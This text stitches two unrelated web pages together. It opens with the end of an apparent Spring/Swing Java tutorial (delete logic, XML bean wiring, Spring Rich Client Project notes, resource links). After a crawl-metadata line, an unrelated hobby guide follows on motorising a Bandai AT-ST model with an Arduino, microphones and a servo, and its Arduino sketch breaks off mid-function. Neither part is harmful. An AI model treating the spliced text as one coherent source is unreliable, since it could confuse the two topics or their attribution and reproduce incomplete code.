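        if (selectedRow == -1) {
            return false; // no selected row: do nothing
        }
        if (editing) {
            return false; // a cell edit is in progress: do nothing
        }
        list.remove(selectedRow);
        return true;
    }

    public static void main(String[] args) {
        List<String> items = new ArrayList<String>(
                Arrays.asList("Item 1", "Item 2", "Item 3"));
        delete(items, 1, false);   // removes "Item 2"
        System.out.println(items); // [Item 1, Item 3]
        delete(items, -1, false);  // ignored: nothing selected
        System.out.println(items); // [Item 1, Item 3]
    }
}
```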
Wiring in the buttons and listeners
Now that you have the code for the buttons and ActionListeners, you wire them together with Spring, just like the other beans, in the app-context.xml file (see Listing 22):
Listing 22. src/todo/app-context.xml - Wiring in the buttons and listeners
<bean id="buttonPanel" class="todo.ui.BoxLayoutPanel" init-method="init">
    <property name="axis">
        <!-- "0" corresponds to BoxLayout.X_AXIS -->
        <value>0</value>
    </property>
    <property name="panelComponents">
        <list>
            <ref bean="deleteButton"/>
            <ref bean="addNewButton"/>
        </list>
    </property>
</bean>

<bean id="deleteButton" class="todo.ui.button.ActionListenerButton" init-method="init">
    <property name="actionListener">
        <ref bean="deleteButtonActionListener"/>
    </property>
    <property name="text">
        <value>Delete</value>
    </property>
</bean>

<bean id="deleteButtonActionListener" class="todo.ui.button.DeleteButtonActionListener">
    <property name="list">
        <ref bean="itemList"/>
    </property>
    <property name="table">
        <ref bean="itemTable"/>
    </property>
</bean>

<bean id="addNewButton" class="todo.ui.button.ActionListenerButton" init-method="init">
    <property name="actionListener">
        <ref bean="addNewButtonActionListener"/>
    </property>
    <property name="text">
        <value>Add New</value>
    </property>
</bean>

<bean id="addNewButtonActionListener" class="todo.ui.button.AddNewButtonActionListener">
    <property name="list">
        <ref bean="itemList"/>
    </property>
    <property name="table">
        <ref bean="itemTable"/>
    </property>
</bean>
You now have two button beans, addNewButton and deleteButton, both of which are instances of ActionListenerButton. Two ActionListener beans (deleteButtonActionListener and addNewButtonActionListener) are defined. They each have the list and table injected into them and are in turn injected into the buttons. The button beans themselves are added to the buttonPanel bean's list of components, so it will lay them out. Note that both the deleteButtonActionListener and addNewButtonActionListener beans have the same Singleton instances of the list and table beans injected into them. This means that they will both modify the same list and table objects.
That's it! Compile and run, and you should see something similar to Figure 5:
Figure 5. The completed To Do List application
Try out the Add New and Delete buttons. Make sure you try adding enough rows and/or resizing the window so that you can see the scrollbar working. You now have a fully functional, rich-client application, written using Spring and Swing. There are a few bugs hiding in it, resulting from this simple implementation. You get extra credit if you find them, and double extra credit if you fix them. If you want to see a much more production-quality example of a Swing application written using Spring, continue on to the next section and check out the Spring Rich Client Project.
The Spring Rich Client Project
This section introduces you to the Spring Rich Client Project (RCP). Although it is still in prerelease development at the time this tutorial is being written, it is a very interesting example of Spring being used to build sophisticated Swing applications.
A slightly higher skill level is required for this section because you'll need to obtain and run (and possibly build) the project yourself. Currently, JDK 1.5 is required to run the sample application. Also, be aware that the latest source might have some temporary problems building or running because it is still in active development.
Spring Rich Client Project overview
The main Spring framework project has a subproject called The Spring Rich Client Project. It is hosted as a SourceForge project and has an active mailing list (see Resources). Although this project is still in a prerelease stage and undergoing architectural changes, it is functional and usable.
The Spring RCP is a good example of the Spring framework's flexibility and of the way Spring provides building blocks that can be used as a foundation for more complex applications and frameworks. It is a basic framework for building Swing-based GUI applications. By providing high-level abstractions such as commands, lifecycle, rules, wizards, forms, views, and preferences, it lets you create nice-looking GUI components and event handling without too much low-level code. A "Petclinic" sample application bundled with the RCP serves as a good example.
At the time this tutorial is being published, no distributed release package of Spring RCP is available. Recent copies of the RCP binaries and source are available at a hosting site (see Resources). If you can't get it there, or you want the latest source, you need to check it out from the Spring RCP CVS repository and build it.
To get the RCP source from CVS, visit the CVS page for the RCP on SourceForge, and check out the HEAD (see Resources). If you don't know how to use CVS, you can visit the CVS home page and/or download a GUI CVS client such as TortoiseCVS or Cervisia (see Resources). If you use Eclipse, then you can use the CVS Repository Exploring perspective to check out the code.
Once you have the code checked out, find the Ant script at samples/petclinic/build.xml and run the build-standalone target. Then run the commands in samples/petclinic/bin/petclinic-standalone.bat. If you have problems and you checked out the source, you might need to rebuild using the clean and alljars targets in the main build.xml in the project's root. If you use Eclipse, run the org.springframework.richclient.samples.petclinic.PetClinicStandalone class (under samples/petclinic/src/) as a Java Application.
When you run the application, you should get a wizard and then a login screen. Enter any ID and password and click on Cancel to get into the application, as shown in Figure 6:
Figure 6. The Spring Rich Client Project Petclinic sample application
Play around with the application a bit and then look into the Petclinic sample source code to see how it works. Even if you don't use the RCP directly, the code can provide you with ideas for designing your own rich-client GUIs using Spring. The RCP and the bundled sample applications also provide good examples of how to use the services provided by the core Spring framework, including event handling, remoting with Hessian, JDBC datasource access, and transaction management with AOP. Just as in your to-do list application, the XML context files are a good starting place to learn how a Spring application is put together.
Summary
In this tutorial, you created a Swing GUI application from scratch, using the Spring framework. You learned about the use and benefits of Spring and about dependency injection. And you learned a bit about good programming practices, such as creating reusable components, and the benefits of loose coupling and high cohesion. You also took a look at the Spring Rich Client Project, which is an example of a framework to support the construction of Swing-based GUI applications using Spring. To learn more, try using Spring out on your next or current project. As you can see from this tutorial, it's easy to learn and use the basics.
Also, using Spring is noninvasive, so you could easily use it in a new module of an existing application without affecting the rest of the application. If you can create an
ApplicationContext and get beans from it, then you can use Spring to wire your objects together. Even if you don't care about using dependency injection for your application right now, you can still use the many useful components that are provided as part of the Spring framework.
You don't even need to use an
ApplicationContext if you don't want to. Instead, you can use the helper and wrapper classes from the framework directly, instantiating and wiring them together manually (although this would probably be harder than just configuring and using them through an
ApplicationContext). The point is that you could if you wanted to, because of the flexibility and reusability that are designed into all aspects of Spring.
In my experience, using dependency injection is a very different approach to designing applications. It simplifies many things, and it can cause you to come up with new and different designs that are better than you would have otherwise. It is especially powerful if you use unit testing a lot, because it makes it much easier to write loosely coupled, easily testable units of code. Some of the benefits are subtle and take a while to realize, such as the reduced maintenance required because there is less configuration and wiring code to maintain. Don't take my word for it though -- try it out on a project of your own, and please feel free to let me know how it goes. Thanks for reading this tutorial, and remember that all feedback is welcome!
Download
Resources
Learn
- Spring framework Web site and About Spring: Visit project headquarters for the Spring framework and read the project's mission statement and feature list.
- "What Is Spring, Part 1" and "What Is Spring, Part 2": Excerpts from the book Spring: A Developer's Notebook by Bruce A. Tate and Justin Gehtland (O'Reilly, 2005).
- The Spring series (Naveen Balani, developerWorks, 2005): A series of articles and examples on the Spring framework.
- "Introduction to the Spring framework": Rod Johnson's article discusses using Spring to develop J2EE applications.
- Spring Rich Client Project home page and developers' mailing list: Learn more about the Spring RCP.
- Swing API Javadoc: Complete documentation for all Swing components.
- Creating a GUI with JFC/Swing: A series of Sun tutorials on how to create GUIs using Swing.
- Singleton Pattern and Observer Pattern: Learn about these design patterns.
- TestDriven.com: Test-driven development (TDD) is a powerful development approach that fits well with Spring.
- "Inversion of Control Containers and the Dependency Injection pattern" and Inversion of Control: Good descriptions of DI/IOC by Martin Fowler.
- "A beginners guide to Dependency Injection": A high-level overview of DI.
- Coupling And Cohesion: Learn more about the good programming practices of low coupling and high cohesion.
- Well-Formed XML Documents: Learn what's involved in maintaining well-formed XML.
- Aspect Oriented Programming with Spring: Documentation on Spring's support for AOP.
- You Arent Gonna Need It (YAGNI): A development approach in which you do not code any functionality until it is needed.
- Do The Simplest Thing That Could Possibly Work: A development approach that encourages you to start new code by keeping it simple and getting it running quickly.
- "An inside view of Observer": An article describing how the Observer pattern is used in Swing.
Get products and technologies
- Spring download page: Download the Spring framework.
- Eclipse: Download the Eclipse IDE.
- Apache Ant: Download the Ant build tool.
- Apache Maven: Download the Maven build tool and project-management environment.
- RCP hosting site: Download recent RCP binaries and source.
- CVS page for Spring RCP: Get current RCP source code from the project's CVS repository on SourceForge.
- Concurrent Versions System (CVS): CVS is a popular open-source version-control system.
- TortoiseCVS GUI and Cervisia CVS GUI: GUI CVS clients for Windows and Unix, respectively.
- JUnit: Download the popular unit-testing framework. Spring makes it easy to unit test.
- Jemmy: Jemmy is a tool for doing functional testing of Swing GUI applications.
- jMock: jMock is a library for testing Java code using mock objects. Spring, JUnit, jMock, and test-driven development are a powerful combination for writing robust, bug-free code.. | http://www.ibm.com/developerworks/java/tutorials/j-springswing/j-springswing.html | CC-MAIN-2014-52 | refinedweb | 9,301 | 55.74 |
wctob man page
Prolog
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
wctob — wide-character to single-byte conversion
Synopsis
#include <stdio.h> #include <wchar.h> int wctob(wint_t c);
Description
The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard..
Return Value
The wctob() function shall return EOF if c does not correspond to a character with length one in the initial shift state. Otherwise, it shall return the single-byte representation of that character as an unsigned char converted to int.
Errors
No errors are defined.
The following sections are informative.
Examples
None.
Application Usage
None.
Rationale
None.
Future Directions
None.
See Also
btow
btowc(3p), wchar.h(0p). | https://www.mankier.com/3p/wctob | CC-MAIN-2019-04 | refinedweb | 172 | 52.15 |
Status
()
People
(Reporter: dbaron, Unassigned)
Tracking
Firefox Tracking Flags
(Not tracked)
Details
Attachments
(4 attachments, 1 obsolete attachment)
DESCRIPTION: The change to the new G++ V3 ABI for gcc 3.0 may well break the xptcall code on all platforms where we use gcc. (If the ABI was changed the same way on all platforms, it will.) I just checked in the fix for x86 (see bug 63604), but we probably need similar fixes on other platforms. The fix for x86 involved conditionally ( #if defined(__GXX_ABI_VERSION) && __GXX_ABI_VERSION >= 100 /* G++ V3 ABI */ ) looking for the address of the nth virtual function pointer at (vptr + n*sizeof(void*)) rather than (vptr + (2 + n)*sizeof(void*)).
Theres a patch in bug 101528 for m68k
*** Bug 103887 has been marked as a duplicate of this bug. ***
My experience in 103887 make me think this is broken on Sparc too. I am running 64bit Solaris 8, with gcc 3.0.1 and failed.
I added xptcinvoke code for Solaris/sparc with gcc3 that works for me in TestXPTCInvoke with gcc 3.0.1. I added it as a separate file since there doesn't seem to be a good way to |#if| assembler with gcc (although I could always remove it later). So if you want to test it, just: Index: Makefile.in =================================================================== RCS file: /cvsroot/mozilla/xpcom/reflect/xptcall/src/md/unix/Makefile.in,v retrieving revision 1.53 diff -u -d -u -0 -r1.53 Makefile.in --- Makefile.in 2001/09/06 08:23:09 1.53 +++ Makefile.in 2001/10/10 06:35:38 @@ -250 +250 @@ -ASFILES := xptcinvoke_asm_sparc_solaris_GCC.s xptcstubs_asm_sparc_solaris.s +ASFILES := xptcinvoke_asm_sparc_solaris_GCC3.s xptcstubs_asm_sparc_solaris.s Though we really need to figure out how to let the build system know whether we're using gcc3 (probably via an autoconf test testing using the |#if| above). I also need to get the file I added reviewed. :-)
The necessary change for PPC linux is just (after bug 86446) the following -- I'm not sure how to conditionally build this change for gcc3: Index: xptcinvoke_asm_ppc_linux.s =================================================================== RCS file: /cvsroot/mozilla/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_asm_ppc_linux.s,v retrieving revision 1.4 diff -u -d -u -0 -r1.4 xptcinvoke_asm_ppc_linux.s --- xptcinvoke_asm_ppc_linux.s 2000/01/08 00:30:05 1.4 +++ xptcinvoke_asm_ppc_linux.s 2001/10/11 00:44:08 @@ -88 +87,0 @@ - addi r4,r4,2 # skip first two vtable entries
Created attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc
Comment on attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc sr=shaver on this patch. What's with the wonky comment style in the GCC3.s file? Tidy up the XPTC_InvokeByIndex intro comment, and sr=shaver there, too. (My sr is enough for the xptcall stuff to go in, but you'll need at least an irc-nod from cls to land the build-fu.)
Attachment #54195 - Flags: superreview+
Comment on attachment 54195 [details] [diff] [review] build changes needed to build GCC3 version for sparc The AC_SUBST(HAVE_GCC3_ABI) needs to go outside of that GNU_CC if statement. Otherwise, the non-gcc3 builds will set HAVE_GCC3_ABI=@HAVE_GCC3_ABI@ which is enough to trigger your ifdef in the xptcall makefile. Fix that && r=cls
Attachment #54195 - Flags: review+
I just checked in the solaris/sparc patch above. So, does anybody have any bright ideas for how to ifdef within xptcinvoke_asm_ppc_linux.s, or should I just copy the file and make the one line change? (m4 is currently only a build requirement for those who want to rerun autoconf. Are we comfortable changing that for some platforms?)
If you want to #ifdef it, why not just run it through the C pre-processor? We figure out how to do that as part of the configure run, I think.
Created attachment 59277 [details] [diff] [review] Patch that I think worked for ppc/gcc3 except the machine was too slow to really test
Except the one tiny little fact that we don't set CPP. Easily changed though.
Well, CPP was set to gcc -E when I tried it. :-)
This looks to be a problem on OSF alpha as well - however i have no knowledge of alpha asm so i am only going by the comments in the existing asm. I guess I could learn, unless someone else fixes it first.
Created attachment 73845 [details] [diff] [review] Fix for gcc-3 on IRIX After applying a fix for bug 86446, this patch will allow compiling with gcc-3 on IRIX (note: there is a gcc bug that causes an ICE with gcc-3.0.4 and below). Applying this patch WITHOUT applying a fix for bug 86446 will not cause a problem for gcc-2.X builds.
added myself to cc list
Patch 59277 does not seem to work, tried it with patch 53024 with gcc 3.1-prerelease (ppc linux) and got crashing mozillas. Where could I find information about the "new" G++ ABI specifically for powerpc, apart from the gcc sources? Note: __GXX_ABI_VERSION is not defined by cpp, gcc or as, but only when g++ is used, at least with this version of gcc.
Could someone please have a look at the IRIX patch? It needs a review, Thanks!
this'll be an issue for the osx mach-o build when apple releases the next round of dev tools. beard, care to take a look at this since you did the last xptcall for mach-o?
If the ABI changes for darwin are the same as for other platforms, the change will probably just be removing the line: addi r5,r5,8 ; (methodIndex * 4) + 8 from xptcinvoke_asm_ppc_rhapsody.s . The fun part is getting the assembly run through the preprocessor so you can #ifdef it.
Note that attachment 59277 [details] [diff] [review] and attachment 73845 [details] [diff] [review] both have different approaches to ifdef-ing. If the one in the latter patch works for you, then that's probably easier.
I can confirm that Mozilla will not compile with Apple's April Dev Tools (including GCC3.1). I'll post the exact error later.
Can someone please review 73845? Is there any chance this will get checked in soon? Also, it really doesn't seem to depend on 102492 (or is that just me?), and it actually DOES depend on 86446.
Comment on attachment 73845 [details] [diff] [review] Fix for gcc-3 on IRIX >@@ -102,12 +114,16 @@ > lw t0, 0(a0) > addu t0, t1 > #ifdef __GNUC__ >+#if (__GNUC__ == 2) > lh t0, 8(t0) >+ addu a0, a0, t0 > #else >- lw t0, 12(t0) >+ # no change for GCC 3 -- that = this > #endif >- >+#else >+ lw t0, 12(t0) > addu a0, a0, t0 >+#endif > > # get register save area from invoke_copy_to_stack > subu t1, t3, 64 One comment about this change: I don't see how gcc3 even needs the two lines before where you changed the ifdefs -- I don't see any uses of t0 later in the code. It might also be clearer if you just put the whole chunk of code inside of "#if !defined(__GNUC__) || __GNUC__ == 2" rather than changing the gcc vs. native ifdefs to handle gcc3 not doing this-adjustment at all. Other than that these changes make sense to me.
Created attachment 93245 [details] [diff] [review] gcc-3 on IRIX... with suggested improvements
Attachment #73845 - Attachment is obsolete: true
Comment on attachment 93245 [details] [diff] [review] gcc-3 on IRIX... with suggested improvements r=dbaron
Attachment #93245 - Flags: review+
What's the status of this with gcc3 on Mac OS X 10.2? I _know_ we're building Chimera under 10.2 and we want to move to that for the Mozilla mach-o builds.
We should be good on gcc3 on OS X 10.2, barring one problem in asdecode. See bug 153525.
Created attachment 126692 [details] [diff] [review] patch to compile with gcc3 on linux-mips I believe this patch fixes the problem on linux-mips. I have tested it and it now compiles with gcc-3.3. I can't get it to run yet, but this is one step on the way :)
I think that's the name mangling change, there. Do you want to use an ifdef for gcc3 like a lot of the other platforms do?
I'm tempted to close this out, since I'm sure we'd have heard more violent noise if we still didn't work with gcc3 on non-x86 systems. Right? For now, though, to the orphanage.
Assignee: shaver → nobody
Please dont close this... it is not fixed! The patches exist, but are not checked in.
there are patches for this problem for alpha in Gentoo, and for ppc in netbsd. there are probably more Linux patches floating out there as well. This bug has been open for THREE YEARS. someone needs to take ownership of it, and start collecting all the halfass workarounds other ``distros'' have done to work around mozilla's non-support of noti386, and commit them to mozilla.org CVS. Why was this bug not fixed as part of #63604? It is a pretty important one. It seems to have slipped through the cracks.
> Why was this bug not fixed as part of #63604? It is a pretty important one. It seems to have slipped through the cracks. That bug may well have fixed x86/nt, but it has not fixed this one. Please take ownership...! There are several parts to this bug, but all the patches (for at least IRIX, and probably others) are available.
Which patches on this bug have not been checked in? Why have the other patches you mention not been contributed back to the Mozilla project? Where are they available?
93245 for eg is not checked in. It does require a patch from 86446 to also be checked in as well (I'm not withholding patches from you ;-) they are all available). There doesn't seem to be any dependency on 102492 however. There also seems to be outstanding patches for ppc and linux/mips... but I could easily be wrong on those ones.
QA Contact: pschwartau → xpconnect
Any value that this bug may previously have had is gone. Please ping me if there are outstanding xptcall patches that need attention.
Status: NEW → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → WORKSFORME | https://bugzilla.mozilla.org/show_bug.cgi?id=71627 | CC-MAIN-2018-47 | refinedweb | 1,717 | 73.88 |
Introduction: Motorized, Sound Reacting Star Wars At-St Bandai Model, With Arduino.
Made from Star Wars At-St Model from Bandai.
Reacts to sound and turns its head towards it.
Made with an Arduino Nano, a 3D-printed custom part, microphones, and a micro servo.
This instructable is made to share the modifications required to achieve the sound-reaction and head-rotation capabilities. It includes the Arduino code, STL files for 3D printing the necessary parts, and, obviously, instructions to make it all happen. It intentionally won't focus on the painting and weathering process, which is a matter of model making; there are several resources for that, which I'll link later on.
Enjoy!
Step 1: Materials
Model Kit
- 1 x AT-ST Walker Star Wars Model Scale 1/48 Model Kit Bandai - On eBay Here - € 33,69
Other Materials
- 1Kg Plaster "scagliola" (for the base) - from the hobby store - 7,10€
- Paint (I painted my model, but this instructable doesn't focus on the painting process)
- An Iron Pin (optional)
Electronic parts
- 1 x Stainless DPDT OFF/ON White Led switch - On eBay Here - €6,99
- 2 x Microphone Sound Module for Arduino - On eBay Here - €1,79 x 2
- 1 x "Arduino Nano" or compatible: Nano V3.0 ATmega328 16M 5V - CH340G board - € 2,70 -On eBay Here
- 1 x IDE HDD ATA 40-pin 80-wire Hard Drive Data Ribbon Cable 30cm - harvested from an old PC or On eBay Here - € 4,40
- 2 x Internal audio cable CD / DVD / DVD-RW Drive - harvested from an old PC or On eBay Here - €3,36 x 2
- 1 x 9V Battery Clip T-type Snap On Connector - On eBay Here - € 1,59
- 1 x box holder for 2 AA batteries (3.3v) - On eBay Here - € 1
- 1 x Micro Servo Tower Pro - On eBay Here - € 1,49
- 2 x CARBON RESISTOR 220K OHM 1/4W +/-5% - On eBay Here - < 0.50€
- 2 mt PVC insulated 1.2 mm electric wire - Harvested or On eBay Here < 0.50€
- 1 x LED 5 mm ORANGE On eBay Here - < 0.50€
- 1 x LED 5 mm Warm White On eBay Here - < 0.50€
Total: €73.28
Step 2: Tools
Tools for model making
This Instructable is not focused on model making.
Let's list the minimal tools necessary for making a model: On Ebay here
- Plastic Sprue Cutter - for cutting & snipping sprues and parts on plastic kits
- Mini Flat File - for filing and smoothing off burrs or excess material.
- Craft Knife - for cutting out shapes, decals and general craft/hobby tasks.
- Self Healing Cutting Mat - protects work surface
The Bandai AT-ST kit is one of the easiest kits available. It can be built without glue (though not for this project). Painting and weathering are suggested but not strictly necessary to achieve a nice model. This project requires some gluing:
- Ciano CA super glue On eBay Here
- Plastic Model Cement (very fluid; works only on unpainted plastic)
General tools
- Dremel On eBay Here
- Scissors
- An abrasive wheel (optional)
- Solder (tin)
- Soldering Iron On eBay Here
- Third Hand Soldering Iron Stand On eBay Here
3d Printing
- A 3d printer is required:
- to produce the joint to fix the mini servo inside the head.
- optionally, also to build the housing inside the base (I'll explain later)
Electronics tools
- A Tester / Multimeter to check connections On eBay Here
- PC or Mac to program Arduino
- Mini USB cable to program Arduino Nano (or compatible) On eBay Here
- Soldering Iron On eBay Here
- Assorted Heat Shrinkable Sleeves On eBay Here
Optional: If you don't own it, get a prototype kit:
- If the circuit get a little complicated it's very easy to mess around.
I suggest to always prototype the circuits before soldering using a prototype kit with:
- An Arduino Uno or Mega (suggested Original) everywhere you like On Ebay Here
- A Breadboard (the small one will be enough) On Ebay Here
- A base to keep it all nicely together. Check this cool one on eBay, available in many colours and sizes, made of acrylic.
- Jumper CablesOn Ebay Here
Step 3: Building the Model: Wire the Legs
Let's build the model.
You have to follow the very good instructions that come with the Bandai model.
When it comes to building the legs, the first modification is required:
- Separate two pairs of wires from the 80-wire hard drive data ribbon, as long as possible (30 cm). You will then have one double wire for each leg. Total: 4 wires.
- Insert each of these electric wires into the model from the bottom of the feet, through the legs, to the central body, and then up to the head. Leave about 10 cm of wire under the feet.
- The wire is very thin, but you still have to remove some plastic here and there to make room for it. Use your craft knife for this.
Sadly, I don't have many photos of this phase, so I drew instructions onto the kit's user manual showing how to manage the joints and wiring. See pics.
Attention!!! The wires are very thin; they can break and can be damaged by glue (especially by plastic cement, which is a solvent) and by paint thinner. Be very careful: I had a very bad problem of this kind myself. Always glue the parts AFTER you have checked the connection.
Step 4: Building the Model: Modify the Neck
If all has gone well, you now should have two 10cm long wires that is coming out from the neck hole into the torso. Each with 2 wires in it. Total 4 wires.
Neck Preparation
- This project requires only 3 wires to the head, so lets' abandon one wire here and to cut here and weld a new 20 cm 3 wires ribbon from "80-wire Hard Drive Data Ribbon" to 3 of the 4 wires available. Use your soldering iron and a small "Heat Shrinkable Sleeve" isolate the soldered parts. The "neck" will later be glued to the torso.
- Prepare the micro servo arm (comes with the servo) , by removing all but the circular ferrule part. Sand it.(see pic)
- Cut the upper part of the neck (see pic). You have to cut until your section's diameter will be the same diameter as the Servo arm. So there will be no step between the two.
- (optional) Prepare an Iron Nail, has to fit inside the modified servo arm hole. Will make it stronger. Pay attention: Its head has be filed to the minimum thickness you can, otherwise the servo joint will not have enough room and will not hold.
Neck Assembly
- Assemble the two halves of the neck, keeping the Wires inside it, and making a hole in the center where there the slot is. Please see pics to get it.
- On the upper top you'll glue (wit CA superglue) the Modified servo arm.
- Optionally you'll make it stronger using the Nail you've prepared.
Neck Sanding
- After drying, sand the top of the neck with sanding paper. Has to be smooth because has to have no friction while rotating.
- Then paint it, if you like...
Neck glueing
- You can glue the neck to the torso while assembling the two halves (in order to better manage the wiring and avoid having to make room for its loop inside the torso). Or you can do it later if you want (as I did): it will be easier to work on the head, but a little harder to assemble it later.
DON'T FORGET TO CHECK THE WIRING WITH THE TESTER
Step 5: Build the Servo Holder
Now we have to modify the head to hold the micro servo and make it fit the servo arm coming from the neck below. This joint will require no glue. I added 2 LEDs and opened only one of the "eyes", as you can see in the pics and video.
3d print the Servo Holder
- 3d Print the part with any 3d printer
- STL Available for download
As you can see the part will perfectly fit with the bottom of the head.
Glue is almost unnecessary (but I glued it anyway).
You can now test-install your servo to see if everything fits well. Also try to attach the neck and check that all is OK.
Leave the servo installed but not glued. This will let you take the measurements for the next step.
Attachments
Step 6: Prepare the Head
Make room for the Micro-Servo
- To make room in the rear of the seats, I moved the floor-and-seats part about 7 mm forward.
- To achieve this you'll have to:
- Cut the front part of the seats. (I used a Dremel, but you can do it with the cutter.)
- Cut a few millimetres off the left and right of the floor-and-seats part as well.
- Cut the back intermediate wall to make room for the servo
- Cut the legs and the hands of the pilot.
Then you have to make it all fit. I recreated the back wall by cutting and repositioning the original one (see pics).
I installed neither the right pilot nor Chewbacca.
You really don't have to worry about these mutilations, because very little will be visible through the eye that is left open. Test it yourself, and see the pics for details.
I'll admit we're losing accuracy here. But we're getting this thing to move!
Paint the inside of the cockpit (if you like)
As said, not much of the cockpit will be visible. If you'd like to paint it, now is the time.
I suggest following this very good tutorial if you want a great guide to painting and weathering this particular cockpit and pilot: Bandai's 1/48th scale AT-ST: Part 5. Video courtesy of Helgan35.
Step 7: Embed the Servo Into the Head
Micro-servo
- A little modification has to be made here in order to conceal the servo wires. If you do not want to see them through the "eye", simply unscrew the servo's top cover and cut a housing into the right side of the servo to route the wires through it.
- I also decided to attach some unused cockpit parts to the servo.
- A blue servo inside the AT-ST head is really not cool. Paint it, with primer or the colour you like!
- Install the two LEDs: I installed the warm white LED to the right of the pilot and the orange LED behind the pilot's seat. See pictures. Not having much room, I glued the LEDs directly onto the servo with CA.
Cable the head
- Make a hole in the head's floor to get our cable inside.
- This part will move a lot, so I suggest making a long loop to allow the full range of movement.
- Add a piece of heat-shrinkable sleeve where the cable enters the hole, to make it stronger.
Assemble the head
We now have our 3 wires inside the AT-ST head.
- It is time to solder the wires (see the Fritzing schematic pic):
- LEDs
- Resistors
- Servo
- Glue all the pieces together with cement. Use CA if you're gluing painted parts.
- I also glued the top part of the servo onto the 3D-printed part with a little CA. (Note: don't worry if you have to replace the servo because its gears are broken, as I did; I managed to do it by removing the top 4 screws.)
Step 8: Build the Electronics
Diagram
You can find two Fritzing diagrams in this tutorial.
- The one in this step is for the testing platform, with an Arduino UNO that will be attached to a PC (or Mac) through USB.
The interference problem
As a premise, I'll say I'm not very confident with electronics. I encountered an interference problem between the servo movement and the mics, and I managed to solve it only by splitting the power source. I know this could be done better; please feel free to comment and suggest improvements. So I have 2 separate power circuits: one for the Arduino Nano, servo, and LEDs (9 V), and the other for the microphones only (3.3 V).
Prototype
I suggest you build this using the prototype set first, and then replicate it in the model.
Once you've made it work on your prototype set, you will transfer it into the model with the Arduino Nano.
So by now you should have:
- Your model fully assembled and painted
- The model completely wired and attached to the prototype kit
- The head detached from the neck.
Step 9: Program Arduino
Program
Time to program our Arduino: connect it to a USB port of your PC, then open the Arduino IDE and upload the sketch below.
About this code, I can say:
- It uses millis() rather than delay() to do its job.
- It has 3 modes:
- "Scan": It's when the machine is like scanning the environment moving slowly its head left and right.
- "AfraidSx": It's when a sound is detected on the Left. The machine turns to left, and randomly moves a it's head figuring out if there's something to shoot at.
- "AfraidDx": Same as above, but on the Right.
Sound detection will trigger one of the above modes
#include <Servo.h>

Servo servo;

int center = 115;
int limitsx = 85;        // left limit (sx = left)
int limitdx = 145;       // right limit (dx = right)
int Behaviour = 1;       // set the initial behaviour
int pos = 85;
int Direction = 1;
byte endingAfraid = 0;

// knock (right microphone)
const int knockSensor = 5;   // the sound module is connected to pin 5
//const int threshold = 100; // threshold value to decide when the detected sound is a knock or not
int sensorReading = 0;
unsigned long millisAtKnockDx = 0;

// knock (left microphone)
const int knockSensor2 = 3;  // the sound module is connected to pin 3
//const int threshold = 100; // threshold value to decide when the detected sound is a knock or not
int sensorReading2 = 0;
unsigned long millisAtKnockSx = 0;

// verbose log
const int VelocityCiclo1 = 1000;
int CountCiclo1 = 0;
unsigned long previousMillis1;

// afraid dx
const int StartVelocityCiclo2 = 100;
const int EndVelocityCiclo2 = 500;
int CountCiclo2 = 0;
unsigned long previousMillis2;
byte servoSweep2 = 0;

// afraid sx
const int StartVelocityCiclo4 = 100;
const int EndVelocityCiclo4 = 500;
int CountCiclo4 = 0;
unsigned long previousMillis4;
byte servoSweep4 = 0;

// led loop
const int VelocityCiclo5 = 200;
int CountCiclo5 = 0;
unsigned long previousMillis5;
byte servoSweep5 = 0;

// scan
const int VelocityCiclo3 = 130;
int CountCiclo3 = 0;
unsigned long previousMillis3;
int pos3 = 0;

// detect noise
int KnockDetected = 0;
int PreviousKnockDetected = 0;
const int VelocityCiclo6 = 500;  // how slowly the noise-detection cycle runs
int CountCiclo6 = 0;
unsigned long previousMillis6;
int NoiseTresh = 2;              // threshold: lower it to make it less sensitive to noise;
                                 // at least 3 knocks within 1000 ms means it is not a trigger
int NoiseDetected = 0;

// delay before leaving noise mode
const int VelocityCiclo7 = 1000; // how long before returning to normal
int CountCiclo7 = 0;
unsigned long previousMillis7;

void setup() {
  servo.attach(6);
  Serial.begin(9600);            // initialize the serial communication for debug
  //pinMode(ControlSwitch, INPUT);
  //pinMode(Led5, OUTPUT);
  pos3 = limitsx;

  // leds
  pinMode(12, OUTPUT);
  pinMode(11, OUTPUT);
  pinMode(10, OUTPUT);
  pinMode(9, OUTPUT);
  pinMode(8, OUTPUT);
  pinMode(7, OUTPUT);
}

void loop() {
  switch (Behaviour) {
    case 1:
      Scan();
      //AfraidFr();
      break;

    case 2:
      if (millis() <= millisAtKnockDx) {   // time window after which we return to scan
        AfraidDx();
      } else {
        Direction = 0;
        Behaviour = 1;
        endingAfraid = 1;
      }
      break;

    case 3:
      if (millis() <= millisAtKnockSx) {   // time window after which we return to scan
        AfraidSx();
      } else {
        Direction = 1;
        Behaviour = 1;
        endingAfraid = 1;
      }
      break;
  }

  KnockTriggerDx();
  KnockTriggerSx();
  VerboseLog();
  DetectNoise();
  digitalWrite(12, HIGH);
  digitalWrite(11, HIGH);
  digitalWrite(10, HIGH);
  digitalWrite(9, HIGH);
  digitalWrite(8, HIGH);
  digitalWrite(7, HIGH);
}

void KnockTriggerDx() {
  // read the sensor and store it in the variable sensorReading:
  sensorReading = digitalRead(knockSensor);
  if (sensorReading == 1) {
    Serial.println("Knock DX !!!!!!!!!!!");
    KnockDetected++;                                   // counted to recognise continuous noise (speech)
    millisAtKnockDx = millis() + random(3000, 10000);  // re-arm the afraid-dx timer
    if (NoiseDetected == 0) {
      Behaviour = 2;                                   // go to afraid dx
    }
    delay(200);
  }
}

void KnockTriggerSx() {
  // read the sensor and store it in the variable sensorReading:
  sensorReading2 = digitalRead(knockSensor2);
  if (sensorReading2 == 1) {
    Serial.println("Knock SX !!!!!!!!!!!");
    KnockDetected++;                                   // counted to recognise continuous noise (speech)
    millisAtKnockSx = millis() + random(3000, 10000);  // re-arm the afraid-sx timer
    if (NoiseDetected == 0) {
      Behaviour = 3;                                   // go to afraid sx
    }
    delay(200);
  }
}

void AfraidDx() {
  if (millis() >= previousMillis2) {
    CountCiclo2++;
    previousMillis2 = previousMillis2 + random(StartVelocityCiclo2, EndVelocityCiclo2);
